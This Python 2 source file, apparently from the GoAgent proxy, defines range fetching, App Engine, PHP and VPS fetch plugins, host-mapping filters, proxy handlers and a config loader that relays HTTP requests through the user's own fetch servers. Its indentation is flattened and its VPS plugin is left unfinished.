def is_google_ip(ipaddr):
if ipaddr in ('74.125.127.102', '74.125.155.102', '74.125.39.102', '74.125.39.113', '209.85.229.138'):
return False
if ipaddr.startswith(('173.194.', '207.126.', '209.85.', '216.239.', '64.18.', '64.233.', '66.102.', '66.249.', '72.14.', '74.125.')):
return True
return False
class RangeFetch(object):
"""Range Fetch Class"""
threads = 2
maxsize = 1024*1024*4
bufsize = 8192
waitsize = 1024*512
def __init__(self, handler, plugin, response, fetchservers, **kwargs):
assert isinstance(plugin, BaseFetchPlugin) and hasattr(plugin, 'fetch')
self.handler = handler
self.url = handler.path
self.plugin = plugin
self.response = response
self.fetchservers = fetchservers
self.kwargs = kwargs
self._stopped = None
self._last_app_status = {}
self.expect_begin = 0
def fetch(self):
response_status = self.response.status
response_headers = dict((k.title(), v) for k, v in self.response.getheaders())
content_range = response_headers['Content-Range']
#content_length = response_headers['Content-Length']
start, end, length = tuple(int(x) for x in re.search(r'bytes (\d+)-(\d+)/(\d+)', content_range).group(1, 2, 3))
if start == 0:
response_status = 200
response_headers['Content-Length'] = str(length)
del response_headers['Content-Range']
else:
response_headers['Content-Range'] = 'bytes %s-%s/%s' % (start, end, length)
response_headers['Content-Length'] = str(length-start)
logging.info('>>>>>>>>>>>>>>> RangeFetch started(%r) %d-%d', self.url, start, end)
self.handler.send_response(response_status)
for key, value in response_headers.items():
self.handler.send_header(key, value)
self.handler.end_headers()
data_queue = Queue.PriorityQueue()
range_queue = Queue.PriorityQueue()
range_queue.put((start, end, self.response))
self.expect_begin = start
for begin in range(end+1, length, self.maxsize):
range_queue.put((begin, min(begin+self.maxsize-1, length-1), None))
for i in xrange(0, self.threads):
range_delay_size = i * self.maxsize
spawn_later(float(range_delay_size)/self.waitsize, self.__fetchlet, range_queue, data_queue, range_delay_size)
has_peek = hasattr(data_queue, 'peek')
peek_timeout = 120
while self.expect_begin < length - 1:
try:
if has_peek:
begin, data = data_queue.peek(timeout=peek_timeout)
if self.expect_begin == begin:
data_queue.get()
elif self.expect_begin < begin:
time.sleep(0.1)
continue
else:
logging.error('RangeFetch Error: begin(%r) < expect_begin(%r), quit.', begin, self.expect_begin)
break
else:
begin, data = data_queue.get(timeout=peek_timeout)
if self.expect_begin == begin:
pass
elif self.expect_begin < begin:
data_queue.put((begin, data))
time.sleep(0.1)
continue
else:
logging.error('RangeFetch Error: begin(%r) < expect_begin(%r), quit.', begin, self.expect_begin)
break
except Queue.Empty:
logging.error('data_queue peek timeout, break')
break
try:
self.handler.wfile.write(data)
self.expect_begin += len(data)
del data
except Exception as e:
logging.info('RangeFetch client connection aborted(%s).', e)
break
self._stopped = True
def __fetchlet(self, range_queue, data_queue, range_delay_size):
headers = dict((k.title(), v) for k, v in self.handler.headers.items())
headers['Connection'] = 'close'
while 1:
try:
if self._stopped:
return
try:
start, end, response = range_queue.get(timeout=1)
if self.expect_begin < start and data_queue.qsize() * self.bufsize + range_delay_size > 30*1024*1024:
range_queue.put((start, end, response))
time.sleep(10)
continue
headers['Range'] = 'bytes=%d-%d' % (start, end)
fetchserver = ''
if not response:
fetchserver = random.choice(self.fetchservers)
if self._last_app_status.get(fetchserver, 200) >= 500:
time.sleep(5)
response = self.plugin.fetch(self.handler, self.handler.command, self.url, headers, self.handler.body, timeout=self.handler.connect_timeout, fetchserver=fetchserver, **self.kwargs)
except Queue.Empty:
continue
except Exception as e:
logging.warning("RangeFetch fetch response %r in __fetchlet", e)
range_queue.put((start, end, None))
continue
if not response:
logging.warning('RangeFetch %s return %r', headers['Range'], response)
range_queue.put((start, end, None))
continue
if fetchserver:
self._last_app_status[fetchserver] = response.app_status
if response.app_status != 200:
logging.warning('Range Fetch "%s %s" %s return %s', self.handler.command, self.url, headers['Range'], response.app_status)
response.close()
range_queue.put((start, end, None))
continue
if response.getheader('Location'):
self.url = urlparse.urljoin(self.url, response.getheader('Location'))
logging.info('RangeFetch Redirect(%r)', self.url)
response.close()
range_queue.put((start, end, None))
continue
if 200 <= response.status < 300:
content_range = response.getheader('Content-Range')
if not content_range:
logging.warning('RangeFetch "%s %s" return Content-Range=%r: response headers=%r, retry %s-%s', self.handler.command, self.url, content_range, response.getheaders(), start, end)
response.close()
range_queue.put((start, end, None))
continue
content_length = int(response.getheader('Content-Length', 0))
logging.info('>>>>>>>>>>>>>>> [thread %s] %s %s', threading.currentThread().ident, content_length, content_range)
while 1:
try:
if self._stopped:
response.close()
return
data = None
with gevent.Timeout(max(1, self.bufsize//8192), False):
data = response.read(self.bufsize)
if not data:
break
data_queue.put((start, data))
start += len(data)
except Exception as e:
logging.warning('RangeFetch "%s %s" %s failed: %s', self.handler.command, self.url, headers['Range'], e)
break
if start < end + 1:
logging.warning('RangeFetch "%s %s" retry %s-%s', self.handler.command, self.url, start, end)
response.close()
range_queue.put((start, end, None))
continue
logging.info('>>>>>>>>>>>>>>> Successfully reached %d bytes.', start - 1)
else:
logging.error('RangeFetch %r return %s', self.url, response.status)
response.close()
range_queue.put((start, end, None))
continue
except StandardError as e:
logging.exception('RangeFetch._fetchlet error:%s', e)
raise
class GAEFetchPlugin(BaseFetchPlugin):
"""gae fetch plugin"""
connect_timeout = 4
max_retry = 2
def __init__(self, appids, password, path, mode, cachesock, keepalive, obfuscate, pagespeed, validate, options, maxsize):
BaseFetchPlugin.__init__(self)
self.appids = appids
self.password = password
self.path = path
self.mode = mode
self.cachesock = cachesock
self.keepalive = keepalive
self.obfuscate = obfuscate
self.pagespeed = pagespeed
self.validate = validate
self.options = options
self.maxsize = maxsize
def handle(self, handler, **kwargs):
assert handler.command != 'CONNECT'
method = handler.command
headers = dict((k.title(), v) for k, v in handler.headers.items())
body = handler.body
if handler.path[0] == '/':
url = '%s://%s%s' % (handler.scheme, handler.headers['Host'], handler.path)
elif handler.path.lower().startswith(('http://', 'https://', 'ftp://')):
url = handler.path
else:
raise ValueError('URLFETCH %r is not a valid url' % handler.path)
errors = []
response = None
for i in xrange(self.max_retry):
try:
response = self.fetch(handler, method, url, headers, body, self.connect_timeout)
if response.app_status < 500:
break
else:
if response.app_status == 503:
# appid over qouta, switch to next appid
if len(self.appids) > 1:
self.appids.append(self.appids.pop(0))
logging.info('gae over qouta, switch next appid=%r', self.appids[0])
if i < self.max_retry - 1 and len(self.appids) > 1:
self.appids.append(self.appids.pop(0))
logging.info('URLFETCH return %d, trying next appid=%r', response.app_status, self.appids[0])
response.close()
except Exception as e:
errors.append(e)
logging.info('GAE "%s %s" appid=%r %r, retry...', handler.command, handler.path, self.appids[0], e)
if len(errors) == self.max_retry:
if response and response.app_status >= 500:
status = response.app_status
headers = dict(response.getheaders())
content = response.read()
response.close()
else:
status = 502
headers = {'Content-Type': 'text/html'}
content = message_html('502 URLFetch failed', 'Local URLFetch %r failed' % handler.path, '<br>'.join(repr(x) for x in errors))
return handler.handler_plugins['mock'].handle(handler, status, headers, content)
logging.info('%s "GAE %s %s %s" %s %s', handler.address_string(), handler.command, handler.path, handler.protocol_version, response.status, response.getheader('Content-Length', '-'))
try:
if response.status == 206:
fetchservers = ['%s://%s.appspot.com%s' % (self.mode, x, self.path) for x in self.appids]
return RangeFetch(handler, self, response, fetchservers).fetch()
handler.close_connection = not response.getheader('Content-Length')
handler.send_response(response.status)
for key, value in response.getheaders():
if key.title() == 'Transfer-Encoding':
continue
handler.send_header(key, value)
handler.end_headers()
bufsize = 8192
while True:
data = None
with gevent.Timeout(self.connect_timeout, False):
data = response.read(bufsize)
if data is None:
logging.warning('response.read(%r) %r timeout', bufsize, url)
handler.close_connection = True
break
if data:
handler.wfile.write(data)
if not data:
cache_sock = getattr(response, 'cache_sock', None)
if cache_sock:
cache_sock.close()
del response.cache_sock
response.close()
break
del data
except NetWorkIOError as e:
if e[0] in (errno.ECONNABORTED, errno.EPIPE) or 'bad write retry' in repr(e):
return
def fetch(self, handler, method, url, headers, body, timeout, **kwargs):
if isinstance(body, basestring) and body:
if len(body) < 10 * 1024 * 1024 and 'Content-Encoding' not in headers:
zbody = deflate(body)
if len(zbody) < len(body):
body = zbody
headers['Content-Encoding'] = 'deflate'
headers['Content-Length'] = str(len(body))
# GAE donot allow set `Host` header
if 'Host' in headers:
del headers['Host']
kwargs = {}
if self.password:
kwargs['password'] = self.password
if self.options:
kwargs['options'] = self.options
if self.validate:
kwargs['validate'] = self.validate
if self.maxsize:
kwargs['maxsize'] = self.maxsize
payload = '%s %s %s\r\n' % (method, url, handler.request_version)
payload += ''.join('%s: %s\r\n' % (k, v) for k, v in headers.items() if k not in handler.skip_headers)
payload += ''.join('X-URLFETCH-%s: %s\r\n' % (k, v) for k, v in kwargs.items() if v)
# prepare GAE request
request_method = 'POST'
fetchserver_index = random.randint(0, len(self.appids)-1) if 'Range' in headers else 0
fetchserver = kwargs.get('fetchserver') or '%s://%s.appspot.com%s' % (self.mode, self.appids[fetchserver_index], self.path)
request_headers = {}
if common.GAE_OBFUSCATE:
request_method = 'GET'
fetchserver += 'ps/%d%s.gif' % (int(time.time()*1000), random.random())
request_headers['X-URLFETCH-PS1'] = base64.b64encode(deflate(payload)).strip()
if body:
request_headers['X-URLFETCH-PS2'] = base64.b64encode(deflate(body)).strip()
body = ''
if common.GAE_PAGESPEED:
fetchserver = re.sub(r'^(\w+://)', r'\g<1>1-ps.googleusercontent.com/h/', fetchserver)
else:
payload = deflate(payload)
body = '%s%s%s' % (struct.pack('!h', len(payload)), payload, body)
if 'rc4' in common.GAE_OPTIONS:
request_headers['X-URLFETCH-Options'] = 'rc4'
body = RC4Cipher(kwargs.get('password')).encrypt(body)
request_headers['Content-Length'] = str(len(body))
# post data
need_crlf = 0 if common.GAE_MODE == 'https' else 1
need_validate = common.GAE_VALIDATE
cache_key = '%s:%d' % (common.HOST_POSTFIX_MAP['.appspot.com'], 443 if common.GAE_MODE == 'https' else 80)
headfirst = bool(common.GAE_HEADFIRST)
response = handler.create_http_request(request_method, fetchserver, request_headers, body, timeout, crlf=need_crlf, validate=need_validate, cache_key=cache_key, headfirst=headfirst)
response.app_status = response.status
if response.app_status != 200:
return response
if 'rc4' in request_headers.get('X-URLFETCH-Options', ''):
response.fp = CipherFileObject(response.fp, RC4Cipher(kwargs['password']))
data = response.read(2)
if len(data) < 2:
response.status = 502
response.fp = io.BytesIO(b'connection aborted. too short leadbyte data=' + data)
response.read = response.fp.read
return response
headers_length, = struct.unpack('!h', data)
data = response.read(headers_length)
if len(data) < headers_length:
response.status = 502
response.fp = io.BytesIO(b'connection aborted. too short headers data=' + data)
response.read = response.fp.read
return response
raw_response_line, headers_data = inflate(data).split('\r\n', 1)
_, response.status, response.reason = raw_response_line.split(None, 2)
response.status = int(response.status)
response.reason = response.reason.strip()
response.msg = httplib.HTTPMessage(io.BytesIO(headers_data))
return response
class PHPFetchPlugin(BaseFetchPlugin):
"""php fetch plugin"""
connect_timeout = 4
def __init__(self, fetchservers, password, validate):
BaseFetchPlugin.__init__(self)
self.fetchservers = fetchservers
self.password = password
self.validate = validate
def handle(self, handler, **kwargs):
method = handler.command
url = handler.path
headers = dict((k.title(), v) for k, v in handler.headers.items())
body = handler.body
if body:
if len(body) < 10 * 1024 * 1024 and 'Content-Encoding' not in headers:
zbody = deflate(body)
if len(zbody) < len(body):
body = zbody
headers['Content-Encoding'] = 'deflate'
headers['Content-Length'] = str(len(body))
skip_headers = handler.skip_headers
if self.password:
kwargs['password'] = self.password
if self.validate:
kwargs['validate'] = self.validate
payload = '%s %s %s\r\n' % (method, url, handler.request_version)
payload += ''.join('%s: %s\r\n' % (k, v) for k, v in headers.items() if k not in handler.skip_headers)
payload += ''.join('X-URLFETCH-%s: %s\r\n' % (k, v) for k, v in kwargs.items() if v)
payload = deflate(payload)
body = '%s%s%s' % ((struct.pack('!h', len(payload)), payload, body))
request_headers = {'Content-Length': len(body), 'Content-Type': 'application/octet-stream'}
fetchserver_index = 0 if 'Range' not in headers else random.randint(0, len(self.fetchservers)-1)
fetchserver = '%s?%s' % (self.fetchservers[fetchserver_index], random.random())
crlf = 0
cache_key = '%s//:%s' % urlparse.urlsplit(fetchserver)[:2]
try:
response = handler.create_http_request('POST', fetchserver, request_headers, body, self.connect_timeout, crlf=crlf, cache_key=cache_key)
except Exception as e:
logging.warning('%s "%s" failed %r', method, url, e)
return
response.app_status = response.status
need_decrypt = self.password and response.app_status == 200 and response.getheader('Content-Type', '') == 'image/gif' and response.fp
if need_decrypt:
response.fp = CipherFileObject(response.fp, XORCipher(self.password[0]))
logging.info('%s "PHP %s %s %s" %s %s', handler.address_string(), handler.command, url, handler.protocol_version, response.status, response.getheader('Content-Length', '-'))
handler.close_connection = bool(response.getheader('Transfer-Encoding'))
while True:
data = response.read(8192)
if not data:
break
handler.wfile.write(data)
del data
class VPSFetchPlugin(BaseFetchPlugin):
"""vps fetch plugin"""
connect_timeout = 4
def __init__(self, fetchservers, username, password):
BaseFetchPlugin.__init__(self)
self.fetchservers = fetchservers
self.username = username
self.password = password
self.fake_headers = {}
def handle(self, handler, **kwargs):
if handler.command == 'CONNECT':
return self.handle_connect(handler, **kwargs)
else:
return self.handle_method(handler, **kwargs)
def handle_connect(self, handler, **kwargs):
return
def handle_method(self, handler, **kwargs):
method = handler.command
url = handler.path
headers = dict((k.title(), v) for k, v in handler.headers.items() if k.title() not in handler.skip_headers)
x_headers = {}
if 'Host' in headers:
x_headers['Host'] = headers.pop('Host')
if 'Cookie' in headers:
x_headers['Cookie'] = headers.pop('Cookie')
headers['Host'] = 'www.%s.com' % self.username
self.fake_headers = headers.copy()
fetchserver = random.choice(self.fetchservers)
response = handler.create_http_request(handler.command, fetchserver, headers, handler.body, self.connect_timeout)
if not response:
raise socket.error(errno.ECONNRESET, 'urlfetch %r return None' % url)
#TODO
class HostsFilter(BaseProxyHandlerFilter):
"""hosts filter"""
def __init__(self, iplist_map, host_map, host_postfix_map, hostport_map, hostport_postfix_map, urlre_map):
self.iplist_map = iplist_map
self.host_map = host_map
self.host_postfix_map = host_postfix_map
self.host_postfix_endswith = tuple(host_postfix_map)
self.hostport_map = hostport_map
self.hostport_postfix_map = hostport_postfix_map
self.hostport_postfix_endswith = tuple(hostport_postfix_map)
self.urlre_map = urlre_map
def gethostbyname2(self, handler, hostname):
hostport = '%s:%d' % (hostname, handler.port)
hosts = ''
if hostname in self.host_map:
hosts = self.host_map[hostname]
elif hostname.endswith(self.host_postfix_endswith):
hosts = next(self.host_postfix_map[x] for x in self.host_postfix_map if hostname.endswith(x))
if hostport in self.hostport_map:
hosts = self.hostport_map[hostport]
elif hostport.endswith(self.hostport_postfix_endswith):
hosts = next(self.hostport_postfix_map[x] for x in self.hostport_postfix_map if hostport.endswith(x))
if handler.command != 'CONNECT' and self.urlre_map:
try:
hosts = next(self.urlre_map[x] for x in self.urlre_map if x(handler.path))
except StopIteration:
pass
if hosts not in ('', 'direct'):
return self.iplist_map.get(hosts) or hosts.split('|')
return None
def filter(self, handler):
host, port = handler.host, handler.port
hostport = handler.path if handler.command == 'CONNECT' else '%s:%d' % (host, port)
headfirst = '.google' in host
if host in self.host_map:
return 'direct', {'cache_key': '%s:%d' % (self.host_map[host], port), 'headfirst': headfirst}
elif host.endswith(self.host_postfix_endswith):
self.host_map[host] = next(self.host_postfix_map[x] for x in self.host_postfix_map if host.endswith(x))
return 'direct', {'cache_key': '%s:%d' % (self.host_map[host], port), 'headfirst': headfirst}
elif hostport in self.hostport_map:
return 'direct', {'cache_key': '%s:%d' % (self.hostport_map[hostport], port), 'headfirst': headfirst}
elif hostport.endswith(self.hostport_postfix_endswith):
self.hostport_map[hostport] = next(self.hostport_postfix_map[x] for x in self.hostport_postfix_map if hostport.endswith(x))
return 'direct', {'cache_key': '%s:%d' % (self.hostport_map[hostport], port), 'headfirst': headfirst}
if handler.command != 'CONNECT' and self.urlre_map and any(x(handler.path) for x in self.urlre_map):
return 'direct', {'headfirst': headfirst}
class GAEFetchFilter(BaseProxyHandlerFilter):
"""gae fetch filter"""
#https://github.com/AppScale/gae_sdk/blob/master/google/appengine/api/taskqueue/taskqueue.py#L241
MAX_URL_LENGTH = 2083
def filter(self, handler):
"""https://developers.google.com/appengine/docs/python/urlfetch/"""
if handler.command == 'CONNECT':
do_ssl_handshake = 440 <= handler.port <= 450 or 1024 <= handler.port <= 65535
return 'strip', {'do_ssl_handshake': do_ssl_handshake}
elif handler.command in ('GET', 'POST', 'HEAD', 'PUT', 'DELETE', 'PATCH'):
return 'gae', {}
else:
if 'php' in handler.handler_plugins:
return 'php', {}
else:
logging.warning('"%s %s" not supported by GAE, please enable PHP mode!', handler.command, handler.path)
return 'direct', {}
class WithGAEFilter(BaseProxyHandlerFilter):
"""withgae/withphp/withvps filter"""
def __init__(self, withgae_sites, withphp_sites, withvps_sites):
self.withgae_sites = set(x for x in withgae_sites if not x.startswith('.'))
self.withgae_sites_postfix = tuple(x for x in withgae_sites if x.startswith('.'))
self.withphp_sites = set(x for x in withphp_sites if not x.startswith('.'))
self.withphp_sites_postfix = tuple(x for x in withphp_sites if x.startswith('.'))
self.withvps_sites = set(x for x in withvps_sites if not x.startswith('.'))
self.withvps_sites_postfix = tuple(x for x in withvps_sites if x.startswith('.'))
def filter(self, handler):
plugin = ''
if handler.host in self.withgae_sites or handler.host.endswith(self.withgae_sites_postfix):
plugin = 'gae'
elif handler.host in self.withphp_sites or handler.host.endswith(self.withphp_sites_postfix):
plugin = 'php'
elif handler.host in self.withvps_sites or handler.host.endswith(self.withvps_sites_postfix):
plugin = 'vps'
if plugin:
if handler.command == 'CONNECT':
do_ssl_handshake = 440 <= handler.port <= 450 or 1024 <= handler.port <= 65535
return 'strip', {'do_ssl_handshake': do_ssl_handshake}
else:
return plugin, {}
class GAEProxyHandler(MultipleConnectionMixin, SimpleProxyHandler):
"""GAE Proxy Handler"""
handler_filters = [GAEFetchFilter()]
handler_plugins = {'direct': DirectFetchPlugin(),
'mock': MockFetchPlugin(),
'strip': StripPlugin(),}
hosts_filter = None
def __init__(self, *args, **kwargs):
SimpleProxyHandler.__init__(self, *args, **kwargs)
def first_run(self):
"""GAEProxyHandler setup, init domain/iplist map"""
openssl_set_session_cache_mode(self.openssl_context, 'client')
if not common.PROXY_ENABLE:
logging.info('resolve common.IPLIST_MAP names=%s to iplist', list(common.IPLIST_MAP))
common.resolve_iplist()
random.shuffle(common.GAE_APPIDS)
self.__class__.handler_plugins['gae'] = GAEFetchPlugin(common.GAE_APPIDS, common.GAE_PASSWORD, common.GAE_PATH, common.GAE_MODE, common.GAE_CACHESOCK, common.GAE_KEEPALIVE, common.GAE_OBFUSCATE, common.GAE_PAGESPEED, common.GAE_VALIDATE, common.GAE_OPTIONS, common.GAE_MAXSIZE)
try:
self.__class__.hosts_filter = next(x for x in self.__class__.handler_filters if isinstance(x, HostsFilter))
except StopIteration:
pass
def gethostbyname2(self, hostname):
iplist = self.hosts_filter.gethostbyname2(self, hostname) if self.hosts_filter else None
return iplist or MultipleConnectionMixin.gethostbyname2(self, hostname)
class ProxyGAEProxyHandler(ProxyConnectionMixin, GAEProxyHandler):
def __init__(self, *args, **kwargs):
ProxyConnectionMixin.__init__(self, common.PROXY_HOST, common.PROXY_PORT, common.PROXY_USERNAME, common.PROXY_PASSWROD)
GAEProxyHandler.__init__(self, *args, **kwargs)
def gethostbyname2(self, hostname):
for postfix in ('.appspot.com', '.googleusercontent.com'):
if hostname.endswith(postfix):
host = common.HOST_MAP.get(hostname) or common.HOST_POSTFIX_MAP.get(postfix) or 'www.google.com'
return common.IPLIST_MAP.get(host) or host.split('|')
return ProxyConnectionMixin.gethostbyname2(self, hostname)
class PHPFetchFilter(BaseProxyHandlerFilter):
"""php fetch filter"""
def filter(self, handler):
if handler.command == 'CONNECT':
return 'strip', {}
else:
return 'php', {}
class VPSFetchFilter(BaseProxyHandlerFilter):
"""vps fetch filter"""
def filter(self, handler):
return 'vps', {}
class PHPProxyHandler(MultipleConnectionMixin, SimpleProxyHandler):
"""PHP Proxy Handler"""
handler_filters = [PHPFetchFilter()]
handler_plugins = {'direct': DirectFetchPlugin(),
'mock': MockFetchPlugin(),
'strip': StripPlugin(),}
def __init__(self, *args, **kwargs):
SimpleProxyHandler.__init__(self, *args, **kwargs)
class ProxyPHPProxyHandler(ProxyConnectionMixin, PHPProxyHandler):
def __init__(self, *args, **kwargs):
ProxyConnectionMixin.__init__(self, common.PROXY_HOST, common.PROXY_PORT, common.PROXY_USERNAME, common.PROXY_PASSWROD)
PHPProxyHandler.__init__(self, *args, **kwargs)
def gethostbyname2(self, hostname):
return [hostname]
class Common(object):
"""Global Config Object"""
ENV_CONFIG_PREFIX = 'GOAGENT_'
def __init__(self):
"""load config from proxy.ini"""
ConfigParser.RawConfigParser.OPTCRE = re.compile(r'(?P<option>\S+)\s+(?P<vi>[=])\s+(?P<value>.*)$')
self.CONFIG = ConfigParser.ConfigParser()
self.CONFIG_FILENAME = os.path.splitext(os.path.abspath(__file__))[0]+'.ini'
self.DATA_PATH = os.path.join(root_path, os.pardir, os.pardir, "data", "php_proxy")
if not os.path.isdir(self.DATA_PATH):
os.mkdir(self.DATA_PATH)
self.CONFIG_USER_FILENAME = os.path.join(self.DATA_PATH, "config.ini")
if os.path.isfile(self.CONFIG_USER_FILENAME):
self.CONFIG.read([self.CONFIG_FILENAME, self.CONFIG_USER_FILENAME])
else:
self.CONFIG.read(self.CONFIG_FILENAME)
for key, value in os.environ.items():
m = re.match(r'^%s([A-Z]+)_([A-Z\_\-]+)$' % self.ENV_CONFIG_PREFIX, key)
if m:
self.CONFIG.set(m.group(1).lower(), m.group(2).lower(), value)
self.LISTEN_IP = self.CONFIG.get('listen', 'ip')
self.LISTEN_PORT = self.CONFIG.getint('listen', 'port')
self.LISTEN_USERNAME = self.CONFIG.get('listen', 'username') if self.CONFIG.has_option('listen', 'username') else ''
self.LISTEN_PASSWORD = self.CONFIG.get('listen', 'password') if self.CONFIG.has_option('listen', 'password') else ''
self.LISTEN_VISIBLE = self.CONFIG.getint('listen', 'visible')
self.LISTEN_DEBUGINFO = self.CONFIG.getint('listen', 'debuginfo')
self.GAE_ENABLE = self.CONFIG.getint('gae', 'enable')
self.GAE_APPIDS = re.findall(r'[\w\-\.]+', self.CONFIG.get('gae', 'appid').replace('.appspot.com', ''))
self.GAE_PASSWORD = self.CONFIG.get('gae', 'password').strip()
self.GAE_PATH = self.CONFIG.get('gae', 'path')
self.GAE_MODE = self.CONFIG.get('gae', 'mode')
self.GAE_IPV6 = self.CONFIG.getint('gae', 'ipv6')
self.GAE_WINDOW = self.CONFIG.getint('gae', 'window')
self.GAE_KEEPALIVE = self.CONFIG.getint('gae', 'keepalive')
self.GAE_CACHESOCK = self.CONFIG.getint('gae', 'cachesock')
self.GAE_HEADFIRST = self.CONFIG.getint('gae', 'headfirst')
self.GAE_OBFUSCATE = self.CONFIG.getint('gae', 'obfuscate')
self.GAE_VALIDATE = self.CONFIG.getint('gae', 'validate')
self.GAE_TRANSPORT = self.CONFIG.getint('gae', 'transport') if self.CONFIG.has_option('gae', 'transport') else 0
self.GAE_OPTIONS = self.CONFIG.get('gae', 'options')
self.GAE_REGIONS = set(x.upper() for x in self.CONFIG.get('gae', 'regions').split('|') if x.strip())
self.GAE_SSLVERSION = self.CONFIG.get('gae', 'sslversion')
self.GAE_PAGESPEED = self.CONFIG.getint('gae', 'pagespeed') if self.CONFIG.has_option('gae', 'pagespeed') else 0
self.GAE_MAXSIZE = self.CONFIG.getint('gae', 'maxsize')
if self.GAE_IPV6:
sock = None
try:
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
sock.connect(('2001:4860:4860::8888', 53))
logging.info('use ipv6 interface %s for gae', sock.getsockname()[0])
except Exception as e:
logging.info('Fail try use ipv6 %r, fallback ipv4', e)
self.GAE_IPV6 = 0
finally:
if sock:
sock.close()
if 'USERDNSDOMAIN' in os.environ and re.match(r'^\w+\.\w+$', os.environ['USERDNSDOMAIN']):
self.CONFIG.set('profile', '.' + os.environ['USERDNSDOMAIN'], '')
urlrewrite_map = collections.OrderedDict()
host_map = collections.OrderedDict()
host_postfix_map = collections.OrderedDict()
hostport_map = collections.OrderedDict()
hostport_postfix_map = collections.OrderedDict()
urlre_map = collections.OrderedDict()
withgae_sites = []
withphp_sites = []
withvps_sites = []
crlf_sites = []
nocrlf_sites = []
forcehttps_sites = []
noforcehttps_sites = []
fakehttps_sites = []
nofakehttps_sites = []
dns_servers = []
for site, rule in self.CONFIG.items('profile'):
rules = [x.strip() for x in re.split(r'[,\|]', rule) if x.strip()]
if site == 'dns':
dns_servers = rules
continue
if rule.startswith(('file://', 'http://', 'https://')) or '$1' in rule:
urlrewrite_map[site] = rule
continue
for name, sites in [('withgae', withgae_sites),
('withphp', withphp_sites),
('withvps', withvps_sites),
('crlf', crlf_sites),
('nocrlf', nocrlf_sites),
('forcehttps', forcehttps_sites),
('noforcehttps', noforcehttps_sites),
('fakehttps', fakehttps_sites),
('nofakehttps', nofakehttps_sites)]:
if name in rules:
sites.append(site)
rules.remove(name)
hostname = rules and rules[0]
if not hostname:
continue
if ':' in site and '\\' not in site:
if site.startswith('.'):
hostport_postfix_map[site] = hostname
else:
hostport_map[site] = hostname
elif '\\' in site:
urlre_map[re.compile(site).match] = hostname
else:
if site.startswith('.'):
host_postfix_map[site] = hostname
else:
host_map[site] = hostname
self.HTTP_DNS = dns_servers
self.WITHGAE_SITES = tuple(withgae_sites)
self.WITHPHP_SITES = tuple(withphp_sites)
self.WITHVPS_SITES = tuple(withvps_sites)
self.CRLF_SITES = tuple(crlf_sites)
self.NOCRLF_SITES = set(nocrlf_sites)
self.FORCEHTTPS_SITES = tuple(forcehttps_sites)
self.NOFORCEHTTPS_SITES = set(noforcehttps_sites)
self.FAKEHTTPS_SITES = tuple(fakehttps_sites)
self.NOFAKEHTTPS_SITES = set(nofakehttps_sites)
self.URLREWRITE_MAP = urlrewrite_map
self.HOSTPORT_MAP = hostport_map
self.HOSTPORT_POSTFIX_MAP = hostport_postfix_map
self.URLRE_MAP = urlre_map
self.HOST_MAP = host_map
self.HOST_POSTFIX_MAP = host_postfix_map
self.IPLIST_MAP = collections.OrderedDict((k, v.split('|') if v else []) for k, v in self.CONFIG.items('iplist'))
self.IPLIST_MAP.update((k, [k]) for k, v in self.HOST_MAP.items() if k == v)
self.IPLIST_PREDEFINED = [x for x in sum(self.IPLIST_MAP.values(), []) if re.match(r'^\d+\.\d+\.\d+\.\d+$', x) or ':' in x]
if self.GAE_IPV6 and 'google_ipv6' in self.IPLIST_MAP:
for name in self.IPLIST_MAP.keys():
if name.startswith('google') and name not in ('google_ipv6', 'google_talk'):
self.IPLIST_MAP[name] = self.IPLIST_MAP['google_ipv6']
self.PAC_ENABLE = self.CONFIG.getint('pac', 'enable')
self.PAC_IP = self.CONFIG.get('pac', 'ip')
self.PAC_PORT = self.CONFIG.getint('pac', 'port')
self.PAC_FILE = self.CONFIG.get('pac', 'file').lstrip('/')
self.PAC_GFWLIST = self.CONFIG.get('pac', 'gfwlist')
self.PAC_ADBLOCK = self.CONFIG.get('pac', 'adblock')
self.PAC_ADMODE = self.CONFIG.getint('pac', 'admode')
self.PAC_EXPIRED = self.CONFIG.getint('pac', 'expired')
self.PHP_ENABLE = self.CONFIG.getint('php', 'enable')
self.PHP_LISTEN = self.CONFIG.get('php', 'listen')
self.PHP_PASSWORD = self.CONFIG.get('php', 'password') if self.CONFIG.has_option('php', 'password') else ''
self.PHP_CRLF = self.CONFIG.getint('php', 'crlf') if self.CONFIG.has_option('php', 'crlf') else 1
self.PHP_VALIDATE = self.CONFIG.getint('php', 'validate') if self.CONFIG.has_option('php', 'validate') else 0
self.PHP_FETCHSERVERS = self.CONFIG.get('php', 'fetchserver').split('|')
self.PROXY_ENABLE = self.CONFIG.getint('proxy', 'enable')
self.PROXY_AUTODETECT = self.CONFIG.getint('proxy', 'autodetect') if self.CONFIG.has_option('proxy', 'autodetect') else 0
self.PROXY_HOST = self.CONFIG.get('proxy', 'host')
self.PROXY_PORT = self.CONFIG.get('proxy', 'port')
if self.PROXY_PORT == "":
self.PROXY_PORT = 0
else:
self.PROXY_PORT = int(self.PROXY_PORT)
self.PROXY_USERNAME = self.CONFIG.get('proxy', 'username')
self.PROXY_PASSWROD = self.CONFIG.get('proxy', 'password')
if not self.PROXY_ENABLE and self.PROXY_AUTODETECT:
system_proxy = ProxyUtil.get_system_proxy()
if system_proxy and self.LISTEN_IP not in system_proxy:
_, username, password, address = ProxyUtil.parse_proxy(system_proxy)
proxyhost, _, proxyport = address.rpartition(':')
self.PROXY_ENABLE = 1
self.PROXY_USERNAME = username
self.PROXY_PASSWROD = password
self.PROXY_HOST = proxyhost
self.PROXY_PORT = int(proxyport)
if self.PROXY_ENABLE:
self.GAE_MODE = 'https'
self.CONTROL_ENABLE = self.CONFIG.getint('control', 'enable')
self.CONTROL_IP = self.CONFIG.get('control', 'ip')
self.CONTROL_PORT = self.CONFIG.getint('control', 'port')
self.AUTORANGE_HOSTS = self.CONFIG.get('autorange', 'hosts').split('|')
self.AUTORANGE_ENDSWITH = tuple(self.CONFIG.get('autorange', 'endswith').split('|'))
self.AUTORANGE_NOENDSWITH = tuple(self.CONFIG.get('autorange', 'noendswith').split('|'))
self.AUTORANGE_MAXSIZE = self.CONFIG.getint('autorange', 'maxsize')
self.AUTORANGE_WAITSIZE = self.CONFIG.getint('autorange', 'waitsize')
self.AUTORANGE_BUFSIZE = self.CONFIG.getint('autorange', 'bufsize')
self.AUTORANGE_THREADS = self.CONFIG.getint('autorange', 'threads')
self.FETCHMAX_LOCAL = self.CONFIG.getint('fetchmax', 'local') if self.CONFIG.get('fetchmax', 'local') else 3
self.FETCHMAX_SERVER = self.CONFIG.get('fetchmax', 'server')
